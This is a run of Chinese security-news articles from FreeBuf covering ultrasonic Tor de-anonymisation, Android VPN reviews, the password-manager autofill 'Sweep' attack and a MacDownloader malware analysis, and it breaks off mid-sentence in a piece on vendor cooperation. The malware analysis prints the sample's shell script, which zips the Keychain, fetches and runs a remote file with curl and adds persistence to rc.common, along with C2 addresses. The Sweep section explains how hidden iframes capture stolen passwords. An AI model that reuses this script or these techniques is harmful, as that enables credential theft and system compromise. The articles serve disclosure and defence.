Clipboard Image.png

很多广告商会在自己的网页广告中使用一种名叫uXDT的技术,这项技术可以帮助他们追踪用户的访问习惯,这样就可以更有针对性地向用户投放广告了。此时,攻击者就可以在一个Web页面中嵌入能够发出超声波的广告或JavaScript代码,当Tor用户使用Tor浏览器访问这个页面时,他就可以利用附近的手机或电脑来劫持目标设备向广告商发送识别信标来获取到包含用户敏感信息的数据了。

这种攻击模型是一个由六名研究人员组成的团队研发出来的,并在2016年底发布了出来。据了解,他们还在2016年的Black Hat黑客大会第33届混沌通信大会上演示了这种攻击技术。

基于超声波跨设备追踪技术(uXDT)的攻击模型

他们的研究主要集中在超声波跨设备追踪技术(uXDT)之上,而现代广告平台在2014年左右就已经开始使用这项新技术了。

uXDT技术实现的基础是广告商隐藏于广告中的超声波信号。当广告在电视或广播中播放时,或者是广告代码在移动设备或计算机中运行时,它会发射出超声波信号,而这些信号可以被附近配备了麦克风的笔记本电脑、台式电脑、平板电脑或手机所捕获。这些设备在监听到超声波信号之后,可以解析出其中包含的隐藏指令,然后再根据广告商服务器所返回的数据来提取出目标设备的相关信息。

广告商之所以要使用uXDT技术,主要是为了将不同的设备与同一用户联系起来,了解用户的习惯,并向用户投放更加合适的广告。

的确可以用超声波来对Tor用户进行去匿名化

该团队的其中一位研究人员名叫Vasilios Mavroudis,他在前段时间举行的第33届混沌通信大会上对这种针对Tor用户的去匿名化攻击进行了详细的描述,其中涉及到了Tor用户的真实IP以及其他的一些敏感数据。

这项攻击技术需要欺骗Tor用户去点击访问一个特制的页面,这个页面中包含有能够发射超声波信号的广告或JavaScript代码,而这些广告和JS代码可以命令浏览器通过HTML5的音频API来发射出超声波。

如果Tor用户的手机在旁边,并且手机中安装有特定App的话,那么他的手机将会与一个或多个广告商服务器进行通信,并向服务器发送设备的详细信息。此时,广告商就可以专门为用户量身定制广告,并将用户的电脑和手机联系起来。

根据Mavroudis的描述,移动设备中必须安装一款嵌入了广告SDK的app,且SDK必须支持uXDT。

这也就意味着,情报机构只需要一纸禁令,就可以从广告商那里得到用户的真实身份和其他的详细信息。

Clipboard Image.png

在Mavroudis所进行的测试过程中,研究人员在对他们所截获的超声波信号进行了解析之后,从中获取到了大量的用户信息,其中包括用户的真实IP地址、地理位置坐标、电话号码、AndroidID、设备IMEI码、以及设备的MAC地址等等。

发动这种攻击的方法不止一种

根据Mavroudis的描述,除了利用社会工程学技术来欺骗Tor用户访问特定的URL之外,我们还有很多种方法可以发动这种攻击。

研究人员表示,攻击者可以利用XSS漏洞来向包含XSS漏洞的网站中注入恶意JavaScript代码。同样的,攻击者也可以搭建一个恶意的Tor结点来进行中间人攻击,然后通过注入恶意代码来强制触发所有流经这个Tor伪节点的Tor流量中的uDXT信标。

还有一种更加简单的方法,就是将负责发射超声波的恶意代码注入至一些Tor用户可能会打开的视频或音频文件中,人耳是无法听见超声波的,所以用户根本就不会觉察到任何的异常。

美国联邦调查局肯定会对这种攻击方法非常感兴趣,因为他们可以用这项技术来追踪那些使用Tor网络来观看儿童色情视频的人,就像当初他们在调查Playpen案件时一样,只不过当时他们利用的是一个AdobeFlash漏洞。

针对uXDT攻击的缓解方案

目前相关部门还没有针对uXDT出台任何的监管条例。目前,FTC公司的安全研究人员正在对uXDT广告的影响进行评估。与此同时,该团队也给我们提供了一系列能够限制这种攻击的缓解方案。

首先,该团队开发出了一款名叫SilverDog的Chrome浏览器插件,该插件可以对浏览器所要播放的HTML5音频文件进行过滤,并去除其中可能存在的超声波。

遗憾的是,如果用户使用的是FlashPlayer,并且回放音频文件的话,这款插件就失效了,而且它也无法保证Tor浏览器的用户,因为Tor浏览器是基于Firefox的。

Clipboard Image.png

除此之外,研究人员也提出了一种新型的Android权限检测机制,用户也许可以通过对AndroidApp进行权限检查来发现那些可能会发射超声波的App。

Clipboard Image.png

从长远的角度来看,该研究团队认为有关部门应该针对这种超声波广告信标专门制定出一种行业化标准,并且开发出一款可以检测和管理超声波信标的系统层API。除此之外,研究团队在几个月前就已经将相关信息告知了Tor项目组,希望Tor开发者们可以尽快解决这个问题。

下面就是Mavroudis在第33届混沌通信大会上的演讲视频:

* 参考来源:bleepingcomputer, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

本文将告诉各位同学如何通过VPN来保护Android手机的隐私安全,你也许不需要花任何的钱,但免费的VPN应用也有其不足之处。

Clipboard Image.png

在Android手机上使用VPN不仅可以帮助你访问那些被墙掉的内容,而且还可以让你在上网过程中保持匿名性。目前市场上有很多App可以给用户提供免费或收费的VPN服务,但是哪一款才是最适合你的呢?

为此,我们专门对目前市场上最热门的六款AndroidVPN应用进行了测试,并对这些VPN服务的性能进行了全面的分析。当然了,你也可以选择使用其他厂商的VPN服务,或直接使用Android平台内置的VPN工具,经过一些自定义设置之后,Android内置的VPN工具同样会非常的好用。

为什么要使用VPN?

简单来说,VPN(虚拟专用网络)可以将你所有的网络通信数据汇集到一台远程服务器中,然后再由这台服务器将数据发送到目标地址。用户可以通过VPN来伪造定位数据,并掩盖自己的真实IP地址。VPN会对流经服务器的网络数据进行加密处理,并增加数据窃听者的攻击难度。从某种程度上来说,即便你使用的是不安全的WiFi网络,VPN也同样能够保障你的数据安全。

由于VPN可以帮你伪造地理位置信息,所以你就可以利用VPN来访问某些受到地理限制的服务,例如脸书等等。但是在享受这种“畅通无阻”的服务时,用户也需要关注VPN服务提供商的安全问题,毕竟他们可以访问你所有的网络数据。就好比HolaVPN一样,这家VPN服务提供商存在严重的安全问题,所以用户应该尽量避免使用这类VPN。

某些VPN会故意增加你通信链接中的网络节点“跳数”,并提高网络通信的延迟。用户在使用一个高速VPN时是不会感觉到高延迟的,但某些免费的移动端VPN服务甚至会让普通的视频通话都难以正常进行下去。每一款VPN服务的网速都是不同的,有的区别甚至是一个天一个地,所以网速也是我们需要测试的其中一个因素。

TunnelBear【下载地址

Clipboard Image.png

特点:一款精巧的app,网速很快,提供了免费流量

这款VPN的性能非常稳定,网速也非常快,而且没有任何的广告。TunnelBear使用起来也比市面上其他免费VPN的体验度要好得多,而且用户也可以随意选择世界各地的VPN服务器。

TunnelBear唯一的一个不足之处就是可供用户免费使用的VPN流量有限,每位用户每月只有500MB的免费流量,但用户也可以通过发Twitter帮它做广告来换取更多的免费流量。如果你想要无限流量的话,每个月支付4美金就可以了。不过在使用之前,你还需要注册一个TunnelBear账号。

Opera VPN【下载地址

Clipboard Image.png

特点:免费,MaterialDesign风格,速度快

在我们所测试的VPN服务中,OperaVPN属于速度较快的那一类,但它偶尔也会出现网络中断的情况。虽然App中有广告,但并不会影响用户的正常使用。需要注意的是,OperaVPN没有对BT下载进行限制。

目前OperaVPN只有五个地区的服务器可供用户使用,但该服务是免费的,而且速度也非常快,作为一款免费产品绝对是良心之作了。

Betternet【下载地址

Clipboard Image.png

特点:速度慢,免费版的可选设置项非常少

Betternet的App设计得算是很不错了,当VPN处于运行状态时广告不会老是弹出来,只有当你打开App的时候才会弹出一个全屏广告。但是它最大的一个问题就是速度太慢了,在我的两次测试过程中,Betternet的网速都没超过1MB。而且免费版也不支持用户手动选择服务器,所以得到的服务器质量好坏全凭运气,很明显我测试的时候运气就不是很好。

Betternet的付费版本每个月为12美金,付费版的网速会快很多,支持用户手动选择服务器,而且也没有任何的广告。

Turbo VPN【下载地址

Clipboard Image.png

特点:免费,速度稳定

Turbo VPN的速度其实并非真的像自带涡轮增压一样快,但是它的网速非常稳定。它的App非常简洁干净,在界面上只有一只躺着的兔子。我个人很喜欢这种设计,但不足之处就是它老是会弹出各种全屏广告,这我就不能忍了。

Turbo VPN只有五个地区的服务器可供选择,但作为一款免费的VPN服务,你还想要求什么呢?如果没有那么多烦人的广告,那么相比OperaVPN来说,我更愿意使用TurboVPN。但广告是别人赚钱的方式,所以怎样选择就看用户自己了。

Hotspot Shield【下载地址

Clipboard Image.png

特点:速度极快,广告较多

在整个测试过程中,HotspotShield的网速是最快的,而且比其他的VPN服务要快很多。它也会弹广告,虽然广告数量没有TurboVPN那么多,但也足够烦人的了。App的使用非常简单,设计得也非常简洁。不幸的是,免费版可选的服务器数量非常少。

付费版的HotspotShield每个月为12美金,但它不仅仅只是Android端的VPN工具,HotspotShield的许可证也可以在Windows或Mac端使用。如果你只在Android端使用的话,这个价格就有些不划算了。

SuperVPN【下载地址

Clipboard Image.png

特点:速度不是最快的,可选服务器较少,广告超级多

在我的测试过程中,SuperVPN并不是最快的那一个,而且也有大量的广告,它算是广告数量最多的那一个了。这也就算了,但免费版的SuperVPN只有四个地区的服务器可供选择,这就不能忍了。付费版价格为每月5美金,你可以享受速度更快且无广告的VPN服务。但是用户还需要一个单独的支付程序来付款,这就非常奇怪了。也许没有多少用户会选择使用SuperVPN吧?

手动配置VPN

VPN的世界可不是一个PlayStore应用商店能装得下的,VPN服务提供商为多种平台都提供了VPN服务,你可以用你的VPN账号在Android系统上建立自己的原生VPN链接。虽然你可能需要多花一点时间,但这种方式更加便宜,而且功能也更强大。

Clipboard Image.png

目前最常用的VPN服务应该就是Private Internet AccessNordVPNKeepSolid了。它们都会给用户提供服务器和账号的详细信息,你可以将其添加到Android的VPN菜单中。新建一个VPN链接,然后将VPN供应商提供给你的账号和密码输入进去,一般也无需你去进行任何高级设置就可以连接成功了。

不过烦人的一点就是,如果你想使用另一台VPN服务器的话,你就要新建一个VPN链接了。除此之外,当你每次要开启或关闭VPN服务时,你都要进入到系统设置菜单之中。当然了,你也可以为你的VPN在桌面建立一个快捷方式之类的来方便操作。

结束语

当你连接到了一个不受信任的网络时,无论你上网的目的是什么,使用VPN绝对是好处大于坏处的,这也是一种非常好的习惯。我相信,随着人们的安全意识和隐私意识日益增强,VPN肯定会成为每个人手机中必不可少的东西。

* 参考来源:networkworld, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

作为一个会每天访问Freebuf网站的人,或者说是一个对信息安全感兴趣的人,肯定会知道一位用户所有的网络账号不应该都使用相同的密码,这也是一个最基本的安全常识。可是那然后呢?

Clipboard Image.png

前言

那么为了让每一个账号都能拥有一个健壮的密码,你可能就需要用到密码管理器了。也许当你第一次使用密码管理器的时候,你心里会有些忐忑不安,毕竟你将所有的密码都放在了这一个地方,而你又可以跨设备跨平台地通过云端来同步自己的密码,这种便捷性肯定会让每一个用户对密码管理器的安全产生质疑。

悲剧的是,你的质疑是对的。在这篇标题为《密码管理器:攻击与防御》【点我下载】的论文中,作者David Silver告诉了我们很多密码管理器中都存在严重的安全漏洞,而这些漏洞与密码自动填写有着密切的联系。虽然这是一篇发表于2014年的论文,其中描述的很多攻击向量可能已经失效了,但是本文是我研读完这篇论文之后所得到的启发,也许我的这些观点和看法可以给大家带来很多灵感,而且我认为这些攻击方法的变种版本目前仍然是有效的。

简而言之,请各位不要再使用表单自动填写功能了!了!了!重要的事情说三遍…

坐在咖啡店角落里的黑客

这种攻击者可以主动发动中间人攻击,即拦截并修改目标网络中通信双方的任意网络流量数据。但是在这种攻击场景中,用户并不需要明确地访问或登录任何一个页面,攻击者仍然可以窃取用户的登录凭证。

Clipboard Image.png

比如说,攻击者只需要在某家咖啡店建立一个伪造的WiFi热点,当你连接至该热点之后,你的密码就全部到攻击者的手中了。这种攻击方法非常简单,攻击者只需要一个临时的网络路由器就可以发动攻击,而且这种情况在现实场景中也会经常发生。在大多数情况下,用户根本无需与钓鱼网站进行任何交互,攻击者可以在用户毫不知情的情况下窃取所有的密码。

Sweep攻击

基本上,任何支持密码表单自动填写的密码管理器都无法抵御Sweep攻击。当目标用户连接到了一个由攻击者控制的流氓WiFi热点之后,攻击就悄悄发生了…

当用户启动浏览器之后,浏览器会被重定向至一个标准的热点登录页面,并询问用户是否同意WiFi使用条款。对于公共WiFi热点来说,这种情况很常见,而且绝大多数用户都会选择同意。但是用户可能压根就不知道这个页面中存在不可见的HTML元素,而这个隐藏元素已经完成了所有的攻击。

换句话说,当你正在阅读这个已经加载完成了的WiFi登录页面时,你绝大多数的登录凭证早就已经“不翼而飞”了。在测试环境下,我们每秒钟大约可以从目标设备中提取出十个密码。

以下是三种Sweep攻击者在登录页面中最常用的密码窃取技术:

1.    在页面中嵌入一个不可见的iFrame,然后再让这个iFrame指向任意站点的任意页面。当浏览器加载完所有的frame之后,攻击者就可以在每一个frame中注入一个登录表单和JavaScript脚本。此时,一个拥有密码表单自动填写功能的密码管理器就会毫不犹豫地将相应的密码填写进去。比如说,攻击者想要窃取目标用户的QQ号和微博账号,那么他就可以在这个隐藏的iFrame元素中嵌入两个frame,然后分别让每一个frame指向包含QQ登录表单和微博登录表单的页面,如果此时用户的密码管理器中保存了QQ密码和微博密码的话,攻击也就成功了。

2.    除了iFrame之外,攻击者还可以使用多重窗口来实现攻击。攻击者可以在用户获得WiFi网络使用权之前强制弹出一个窗口,然后提醒用户允许所有的弹窗。虽然相比iFrame来说,弹窗的形式可能比较容易吸引注意,但我们可以通过注入恶意JS代码或将窗口放置屏幕边缘来尽量增加它的隐蔽性。当攻击者成功获得密码之后,可以立刻关闭这些窗口。

3.    第三种方法就是使用一系列的重定向链接。当用户请求某个页面时,攻击者可以将用户请求重定向至另一个网站(例如攻击者希望窃取的密码所属站点),然后通过注入恶意JS代码向页面添加一个登录表单,并隐藏页面的其他内容。当密码管理器自动填写了密码之后,密码就会被自动提取出来,然后浏览器又会被重定向至下一个目标站点,然后以此类推,不断地往下,最后才会加载用户当初所要访问的那个页面。然而,这一切对于用户来说,他们只会感觉这个WiFi网络速度很慢…

在2014年的时候,也就是这篇论文发表的时候,研究人员对下图所示的密码管理器进行了测试,结果如下:

Clipboard Image.png

注入

Sweep攻击要求攻击者具备发动中间人攻击和修改目标站点的能力,当用户访问的目标页面正好是登录页面的时候,攻击就会非常简单了。实际上,只要是目标页面与登录页面是同源的,就已经足够了,因为所有的密码管理器都会自动将保存的密码与域名进行绑定,并且会忽略掉登录页面的实际路径。

另外一种网站比较容易受攻击的情况就是,使用HTTP来加载登录表单,然后使用HTTPS来提交表单内容,这是一种非常不好的实践方式。根据2013年10月份的一项调查数据,AlexaTop 500的网站中有17%的网站其登录表单是存在这种问题的。虽然现在已经是2017年了,但我认为这种现象依旧存在。

任何一个HTTPS页面如果通过HTTP来获取动态内容的话,那么这个页面就是不安全的,而目前大多数浏览器都会屏蔽这些页面。在这种情况下,即便登录页面使用的是HTTPS,该网站任何页面中的XSS漏洞都将有可能被正常触发。实际上,攻击者只需要利用一个XSS漏洞就能完成攻击,而且完全不需要搭建流氓WiFi热点,攻击者只需要欺骗用户去访问他们所控制的恶意页面即可。

由错误的证书所导致的HTTPS通信异常也有可能允许攻击者利用一个修改后的登录页面(使用自签名证书)来发动攻击。浏览器会检测到这种异常,但用户往往会直接忽略警告。

密码提取

当伪造页面中的JS脚本获取到了用户密码之后,提取密码的过程就非常简单了。一种方法是加载一个不可见的iFrame,然后将用户凭证通过参数来传递。另一种方法是修改登录表单的action参数,然后将用户凭证通过表单提交至攻击者控制的站点。

如果密码管理器没有自动填写密码的话,该怎么办呢?

目前为止,本文所描述的全部攻击方法可以正常工作的前提就是:用户无需直接与登录表单进行交互,密码管理器的密码自动填写功能可以正常工作并自动填写密码。但是,论文中介绍的密码提取技术与登录表单是如何填写的没有多大关系。简而言之,只要表单中填写了密码,我们就可以获取到,无论这个密码是用户手动输入的还是系统自动填写的。

论文作者介绍的是一种点击劫持攻击,该技术在本文的这种攻击场景下能够正常工作,但唯一不足之处就是一次只能提取出一个账户密码。关于该技术的详细内容请参阅论文原文【传送门】。

应对措施

最有效的防御措施就是采用Secure Filling(安全填写),如果你想体验Secure Filling,那么你将需要一个修改版的浏览器以及一个可以与之协同工作的修改版密码管理器。

如果登录页面是通过HTTP加载,并使用HTTPS提交,那么当这个登录表单填写完成之后,就没有任何一款浏览器或密码管理器能够保证用户密码的安全了。因为JavaScript脚本不仅可以直接从表单中读取出密码,还可以修改表单的action属性,并将密码发送给攻击者。Secure Filling技术的作用就在于,如果攻击者向登录页面注入了恶意JS代码的话,只要表单是通过HTTPS提交的,那么用户密码就是安全的。

Clipboard Image.png

Secure Filling技术要求:

1.    当密码管理器首次保存用户名和密码时,需要保存此时登录表单中的action参数值。

2.    当密码管理器自动填写完登录表单之后,禁止JS代码访问该表单(因此需要一个修改版的浏览器)。

3.    在密码自动填写的过程中,如果用户名或密码文本域被修改了,那么密码管理器会放弃填写,并清除已填写的内容。

4.    当填写完成的表单提交,并且该运行的JS代码全部运行完成之后,浏览器需要检测当前表单的action参数值是否与一开始保存的表单action相同,只有在参数值相同的时候浏览器才会真正提交表单数据。

结束语

这些问题已经上报给了相关的密码管理器服务商,并且厂商也修改了各自密码管理器的自动填写策略。由于本论文所发现的问题,LastPass将不再对iFrame中的密码文本域进行自动填写,1Password也不再自动填写HTTP页面中的密码表单了。

关于1Password和Sweep攻击的更多内容可以参阅这篇文章【传送门】。

* 参考来源:acolyer, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

Clipboard Image.png

概述

近期,研究人员发现了一款针对美国国防工业的macOS恶意软件,该恶意软件名叫MacDownloader,有一位人权倡导者还公开表示他曾受到过MacDownloader的攻击。MacDownloader会伪装成AdobeFlash和Bitdefender Adware Removal Tool的安装程序,感染成功后会尝试提取目标系统信息以及OSX的keychain数据库。在对受感染的基础设施以及恶意代码进行了观察和分析之后,我们认为此次事件是这款恶意软件第一次真正试图感染目标设备,而且代码中类似“持久性感染”这样的功能也无法正常工作。

MacDownloader目前只是一款简单的数据提取工具,但它的野心肯定不仅于此。MacDownloader感染目标主机所使用的方法与ExtremDownloader的方法十分相似,而且研究人员在对恶意软件样本的代码进行了分析之后发现,这款恶意软件很可能与某个长期潜伏着的威胁组织有关。

虽然我们在美国的BlackHat黑客大会上曾对伊朗主导的网络战争进行过技术论述,而且相关论文【传送门】也正准备出版,但我们仍然会继续披露当前伊朗黑客的一些网络活动,并以此来积极推广网络安全教育,然后向安全厂商提供更多的IOC(入侵检测指标)。

虽然这款恶意软件不算复杂,功能也并不丰富,但它的突然出现肯定会给Mac用户带来不小的担忧。随着苹果电脑的用户数量越来越多,针对macOS的恶意软件数量很有可能也会随之上涨,macOS的安全性已经成为了一个未知数。

背景

自从“伊朗网络威胁论”被曝光之后,我们也检测到了各种各样出自伊朗黑客之手的恶意软件,这些恶意软件普遍针对的是Windows和Android设备,目的是为了从目标设备中提取文件或记录用户键盘数据。虽然Windows仍是目前世界上使用人数最多的操作系统,但很多用户出于安全性和稳定性的考虑,已经开始慢慢转移到macOS平台了。但实际上,macOS用户的安全性远远没有他们想象得那么高,而且他们的安全状况甚至比Windows用户的还要糟糕,专注伊朗问题的人权团体就是一个很好的例子。

事件及其影响

关于MacDownloader的一切起源于一个钓鱼网站,这个网站冒充的是美国联合技术公司(UTC)的官方网站,安全专家此前曾认定这个钓鱼网站是伊朗黑客专门用来传播Windows恶意软件的,而研究人员发现MacDownloader也与这个网站有关,这也是我们首次检测到MacDownloader。该钓鱼网站声称可以提供一些“特殊培训课程”,并专门提到了洛克希德马丁公司、内华达山脉公司、雷神公司和波音公司的实习生岗位。

Clipboard Image.png

托管该网站的主机在此之前还曾用其子域名托管过浏览器攻击框架BeEF,当时网站伪装成的是一个牙科网站和美国空军培训网站。

Clipboard Image.png

Clipboard Image.png

我们可以看到,钓鱼网站用法语提示了用户:该插件可能存在安全问题,并在警告文字的下方提供了一个可以激活AdobeFlash插件的链接。在我们所观察到的恶意软件中,MacDownloader也是第一个如此诚实的恶意软件。当用户上钩之后,远程服务器会根据检测到的目标系统信息来发送Windows或Mac端的恶意软件,其中Windows平台的dropper是采用Go语言编写的。MacDownloader样本的数据包名称“addone flashplayer.app”也进一步证明了它来自伊朗,因为根据语法来看,这个文件名应该是一个说波斯语的人设置的。

Clipboard Image.png

Macdownloader

根据恶意代码中嵌入的字符串信息来看,此次攻击中的恶意软件是一款针对macOS平台的dropper,即Macdownloader。对代码进行了分析之后,研究人员发现Macdownloader创建于2016年底,其代码不仅写得非常乱,而且很多代码是从其他地方复制过来的,所以我们认为Macdownloader应该出自一位业余开发者之手。

研究人员认为,MacDownloader当前的主要目的是为了对受感染系统进行初步分析并提取一些系统数据,例如macOS的Keychain凭证。

截止本文发稿时,VirusTotal的病毒扫描引擎还无法检测到Macdownloader,所以消费者安装的杀毒软件应该也无法检测到它。

Clipboard Image.png

在MacDownloader的感染过程中会显示一个伪造的AdobeFlash Palyer安装对话框,并提示用户点击“Update Flash-Player”按钮。有趣的是,当我们点击“Close”按钮之后,程序并不会退出。当用户点击更新按钮之后,会继续显示一个伪造的对话框,并告知用户已完成更新。

Clipboard Image.png

这样的对话框也让我们感到十分困惑,为什么MacDownloader宁愿伪装成一个FlashPlayer的更新包,也不愿伪装成一款杀毒软件呢?当我们对恶意程序的源文件进行了分析之后,我们得到了答案。在一个NIB文件中,我们发现了很多存在语法错误和拼写错误的对话框数据(看来开发者对MacDownloader的代码质量并不是很在意),我们由此推断MacDownloader一开始是打算伪装成一款病毒清理工具的,但可能是出于社工方面的考虑,开发人员最终将其重新打包成了一个伪造的FlashPlayer更新包。

Clipboard Image.png

Clipboard Image.png

我们发现,app资源文件夹中有一个名叫“checkadr.txt”的文件,其中包含有一条URL地址,恶意软件就是从这个地址下载的:

http://46.17.97[.]37/Servermac.php

该样本所使用的C2服务器在两周之前就被第三方拖下线了,另一个文件“eula-help.txt”中则提供了一个内部开发服务器的地址。由此看来,攻击者只打算将MacDownloader当作一个简单的dropper而已。

http://192.168.3.217/DroperTest

除此之外,在文件“appId.txt”中似乎有一个与该活动有关的恶意软件唯一标识符,恶意软件需要通过这个标识符来与C2主机通信,并将窃取到的信息发送过去。由此看来,攻击者曾尝试去实现目标主机的持久化访问,但目前还没成功。我们还发现了一段写得非常烂的shell脚本,这段代码可以将C2主机的响应信息保存下来,并通过它在/etc/rc.common文件中记录下的条目来标记目标主机。

从理论上来说,每当受感染主机启动时,该脚本都会自动从远程地址下载文件,并植入新版本的恶意软件。但在该主机下线之前我们曾尝试从服务器获取正确的响应信息,但我们并没有接收到后续的植入版本。在测试的过程中,这段代码似乎也没有被执行过。

do shell script "uname -a > /etc/checkdrive.chk"

zip -rj /etc/kcbackup.cfg /Library/Keychains/

echo "#!/bin/bash

curl -o /tmp/mastering-vim.pdf %@

md5 /tmp/mastering-vim.pdf | grep vim | cut -d- -f 2 >/etc/newf_md5.md5

 

if cmp /etc/newf_md5.md5 /etc/old_md5.md5

then

    #echo equal

    cp /etc/newf_md5.md5 /etc/oldf_md5.md5

    chmod +x/tmp/mastering-vim.pdf

   /tmp/mastering-vim.pdf

fi

 

" > /etc/.checkdev && if cat /etc/rc.common| grep .checkdev; then sleep 1; else echo "sleep %d &&/etc/.checkdev &" >> /etc/rc.common; fi && chmod +x/etc/.checkdev && /etc/.checkdev with administrator privileges

MacDownloader在收集完目标系统的信息(包括Keychain数据)之后,会将信息上传至C2服务器。恶意软件会通过一个伪造的系统设置对话框来要求用户输入用户名和密码,在拿到用户凭证之后,攻击者就可以访问存储在Keychain数据库中的加密密码了。所有收集到的信息会被记录在文件/tmp/applist.txt之中,上传成功之后该文件也不会被删除:

[

  "OSversion:[UNAME OUTPUT]",

  "Root Username:\"[USER]\"",

  "Root Password:\"[PASSWORD]\"",

  "Keychainsloaded in current user ",

  "Local ipaddress: [IP ADDRESS]",

  "Ifconfig:[IFCONFIG OUTPUT]",

  [

    [CONTENT OF/Applications]

  ],

  [

    ....

    "process nameis: Bitdefender Adware Removal Tool\t PID: 17550  Run from:file:\/\/\/Users\/user\/Desktop\/addone%20flashplayer.app\/Contents\/MacOS\/Bitdefender%20Adware%20Removal%20Tool"

  ]

]

当整个攻击过程执行完毕之后,MacDownloader会显示一个对话框,并提醒用户Flash Player已经更新完毕。当然了,从始至终这一切跟Flash Player的安装与更新没有任何的关系。这也是伊朗恶意软件典型的攻击模式,在获取到账号密码之后,攻击者会对目标用户的电子邮件、云端文件、以及社交网络活动进行永久备份。

源文件分析

在程序的Info.plist中我们可以获取到一些有用的元数据,其中“Bundle identifier”的属性为“zenderod.Bitdefender-Adware-Removal-Tool”,一般来说第一个字符串就是开发者所在组织的名称,即“zenderod”。Zenderod很明显表示的是Zayandeh Rood,这是一条流经伊朗伊斯法罕的著名河流。有趣的是,它似乎也与伊朗网络公司Novin Pardaz Zenderod的域名非常相似,其域名之前为zenderod.ir,现在是npzr.ir。但是该网站并没有提到任何关于macOS软件开发的内容,我们也尝试联系了Novin Pardaz Zenderod公司的一位管理人员,但他表示他们公司不开发macOS软件,而且也与这款恶意软件没有任何关系。

除此之外,“Readable Copyright”属性中设置的版权信息为“Copyright© 2015 Mamedof. All rights reserved.”,这个过期的版权声明似乎也暗示着这段信息应该是开发者直接从其他项目复制过来的。

在源代码中,我们发现了一些可能代表MacDownloader开发者姓名的字符串,这些字符串暗示着MacDownloader的开发者名字可能是Shayan:

/Users/shayan/Desktop/MacDownloader/MyApp3/

/Users/shayan/Library/Developer/Xcode/DerivedData/Adware_Removal_Tool-frnnuqjzajnllqgzakkslsovdhag/Build/Intermediates/AdwareRemoval Tool.build/Debug/Adware RemovalTool.build/Objects-normal/x86_64/AppDelegate.o

在测试过程中,我们的一台MacBookPro被成功感染了。我们发现,恶意软件会将包括Keychain数据在内的系统信息上传至C2服务器,使用的用户名为“Ultrone”,密码为“saeed”。虽然有价值的信息很少,但攻击者仍然可以从Keychain数据中的VPN凭证和WiFi记录来了解到目标用户的一些社交关系情况。

Clipboard Image.png

入侵检测指标(IOC)

文件哈希

addone flashplayer.app.zip:

52efcfe30f96a85c9c068880c20663db64f0e08346e0f3b59c2e5bbcb41ba73c

Bitdefender Adware Removal Tool:

7a9cdb9d608b88bd7afce001cb285c2bb2ae76f5027977e8635aa04bd064ffb7

网络地址

46.17.97[.]37

officialswebsites[.]info

utc.officialswebsites[.]info

* 参考来源:iranthreats, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

随着网络技术的不断发展,安全厂商也如雨后春笋般涌现出来。从云主机、电子邮件服务器和终端设备的安全,到恶意软件、网络威胁、网络钓鱼以及DDoS攻击保护,几乎各种与互联网以及计算机有关的行业内都有数百家相关的安全厂商正在为他们各自所处的领域而战斗着。

虽然现在针对不同的服务和设备都有着大量的安全解决方案,但问题就在于这些方案并不具备广泛的适用性。也就是说,这个方案可能在你的身上可以完美发挥其功效,但在我身上则毫无实用性,这也给各个安全团队的工作带来了非常大的麻烦。与此同时,网络技术无时无刻都处于不断发展的状态,再加上某些网络犯罪分子的创新能力甚至比财富500强企业还要厉害,这就使得安全人员的日子更加难过了。

针对这种新出现的“合作问题”,Magnum Consulting的分析师Frank J.Ohlhorst表示有话要说

“IT安全已经成为了现代IT环境中最复杂的元素之一,现代IT的每个环节和每一层都需要安全保护,我们不仅需要先进的分析技术来阻止网络攻击,而且还需要先进的防护技术来保护数据的安全。尽管很多企业拥有这样的条件,但这些年来仍然有很多企业无法避免遭到攻击的厄运。

简单来说,之所以会出现这种情况,主要是因为这些安全保护技术全部是由单一的一家厂商提供和部署的,而当今时代的这些网络威胁并非是单独某一家安全厂商可以独自应对的,这也就意味着孤立的安全技术将成为过去。”

Clipboard Image.png

安全厂商合作显得理想化,但这是时代的要求

很多安全专家认为,现在大多数安全厂商正在朝着正确的方向来实现行业内的合作。这种“合作”表示的是在理想情况下,我们应该尽自己可能来让某个系统变得更加安全。与此同时,“合作”也会大大降低开发一套系统的难度,因为开发人员在该系统内部署多种安全产品时就不用再花大量的时间去进行包括兼容性在内的各种测试了。

与几年前相比,现在安全厂商之间的合作也越来越常见了。从技术层面上来看,很多厂商开始开放自己平台的API接口,其他厂商可以通过这些API接口来访问或传输数据。从研究的角度来看,很多厂商也开始在调查和识别网络攻击上有着越来越密切的合作了,有些厂商甚至已经开始合作打击网络犯罪活动了。

威胁情报公司Digital Shadows的首席技术官James Chappell认为,在信息技术、安全标准和威胁情报等领域的厂商合作已经是一件再常见不过的事情了。他在接收CSO Online采访时表示:

“信息安全领域的各大厂商已经意识到了,几乎没有哪项技术能够像“万金油”一样放到哪儿都实用,而且也没有哪一家厂商能够永远保持“一家独大”。

安全是一个非常宽泛的话题,如果我们想要保证安全,那就得在各个方面进行努力,而并非只在一个方面下功夫。所以,这自然而然地就会形成一个成员之间会产生相互联系的生态系统。比如说,我们需要与提供内部安全监控服务以及事件分类服务的公司进行密切合作,这样才能保证我们所生成的警报以及提供的服务能够有效地提升客户事件响应处理的整体效率。”

Raj Samani是英特尔的首席技术官兼欧洲刑警组织的顾问,虽然他对安全厂商之间目前的合作情况不太满意,但他仍然非常看好目前的发展趋势,因为厂商和安全机构在打击网络犯罪和破坏犯罪基础设施的活动中展现出了非常好的合作前景。Samani指出:“在此之前,美国执法工作组与欧洲网络犯罪中心(EC3)就曾在调查网络犯罪组织的过程中与多家私营企业展开了密切的合作,而且合作的密切程度也达到了一种前所未有的等级。”

Clipboard Image.png

合作领域虽然非常广泛,但产品协同仍是大问题

很多技术提供商都是以自身产品中的某些独特功能而屹立于市场的,但安全领域的千变万化意味着某些安全解决方案、安全标准、甚至是安全协议可以在一夜之间变成“废品”。虽然这种专业化仍是我们所需要的,但我们也不得不承认,仅仅依靠类似防火墙和IDS系统这样的传统安全产品已经无法抵御日趋复杂的网络攻击了。因此,传统安全产品之间需要更好的协同工作能力才可以更好地保护终端用户的安全。

很多业内领先的厂商都在需求合作机会,并且正在通过API整合、SaaS、以及基于云计算的商业模型来提升协同工作的能力。更具体来说,他们会交换威胁情报信息和不同产品中存在的安全漏洞。

大数据分析软件供应商Panaseer的首席执行官Nik Whitfield表示,他的公司目前正在对Qualys和赛门铁克提交的数据进行分析和整合,他说到:

